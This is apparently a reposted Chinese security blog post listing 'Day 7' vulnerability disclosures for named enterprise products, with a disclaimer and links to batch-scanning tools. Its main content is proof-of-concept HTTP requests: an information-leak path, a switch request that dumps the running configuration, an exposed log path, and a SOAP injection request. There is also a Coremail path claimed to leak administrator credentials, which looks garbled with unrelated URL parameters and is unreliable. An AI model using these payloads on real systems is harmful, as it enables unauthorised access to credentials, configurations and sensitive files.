国护0day漏洞消息同步(Day7)

admin 2023年8月20日23:26:07评论263 views字数 2627阅读8分45秒阅读模式

国护0day漏洞消息同步(Day7)

免责声明

月落星沉研究室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他违法行为!!!

国护0day漏洞消息同步(Day7)

0x01

启明星辰-4A 统一安全管控平台 getMater 信息泄漏

漏洞描述:
启明星辰集团4A统一安全管控平台实现IT资源集中管理,为企业提供集中的账号、认证、授权、审计管理技术支撑及配套流程,提升系统安全性和可管理能力。可获取相关人员敏感信息。
poc:

relative: req0 session: false requests: - method: GET timeout: 10 path: /accountApi/getMaster.do headers: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.881.36 Safari/537.36 follow_redirects: true matches: (code.eq("200") && body.contains(""state":true"))

修复建议:
限制文件访问

0x02

锐捷交换机 WEB 管理系统 EXCU_SHELL 信息泄露

漏洞描述:锐捷交换机 WEB 管理系统 EXCU_SHELL 信息泄露漏洞
批量扫描工具:https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/unauthorized/%E9%94%90%E6%8D%B7%E4%BA%A4%E6%8D%A2%E6%9C%BAWEB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FEXCU_SHELL
poc

GET /EXCU_SHELL HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2852.74 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: /
Connection: close
Cmdnum: '1'
Command1: show running-config
Confirm1: n

0x03

科荣 AIO 管理系统存在文件读取漏洞

漏洞描述:
科荣AIO企业一体化管理解决方案,通过ERP(进销存财务)、OA(办公自动化)、CRM(客户关系管理)、UDP(自定义平台),集电子商务平台、支付平台、ERP平台、微信平台、移动APP等解决了众多企业客户在管理过程中跨部门、多功能、需求多变等通用及个性化的问题。科荣 AIO 管理系统存在文件读取漏洞,攻击者可以读取敏感文件。
POC待补充

0x04

飞企互联 FE 业务协作平台 magePath 参数文件读取漏洞

漏洞描述:
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联 FE 业务协作平台存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件获取大量敏感信息。
POC待补充

0x05

用友GRP-U8存在信息泄露

漏洞描述:友U8系统存可直接访问log日志,泄露敏感信息
批量扫描工具:https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/unauthorized/%E7%94%A8%E5%8F%8BGRP-U8

GET /logs/info.log HTTP/1.1

0x06

nginx配置错误导致的路径穿越风险

漏洞自查PoC如下: https://github.com/hakaioffsec/navgix 该漏洞非0day,是一个路径穿越漏洞,可以直接读取nginx后台服务器文件。有多家重点金融企业已中招,建议尽快进行自查。

0x07

红帆 oa 注入

POC:

POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.Host: 10.250.250.5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 383 Content-Type: text/xml; charset=utf-8 Soapaction: "http://tempuri.org/GetFileAtt" Accept-Encoding: gzip, deflate Connection: close <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetFileAtt xmlns="http://tempuri.org/"><fileName>123</fileName></GetFileAtt> </soap:Body></so ap:Envelope>

0x08

Coremail 邮件系统未授权访问获取管理员账密

POC:

/coremail/common/assets/:/:/:/:/:/:/s?
biz=Mzl3MTk4NTcyNw==&mid=2247485877&idx=1&sn=7e5f77db320ccf9013c0b7aa7262
6688chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688b
f6adaed61&scene=2

这是我们手上掌握的部分漏洞,还有更多漏洞将在后面曝光,关注月落安全,大佬带你飞。

国护0day漏洞消息同步(Day7)

原文始发于微信公众号(月落安全):国护0day漏洞消息同步(Day7)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月20日23:26:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   国护0day漏洞消息同步(Day7)http://cn-sec.com/archives/1958046.html

发表评论

匿名网友 填写信息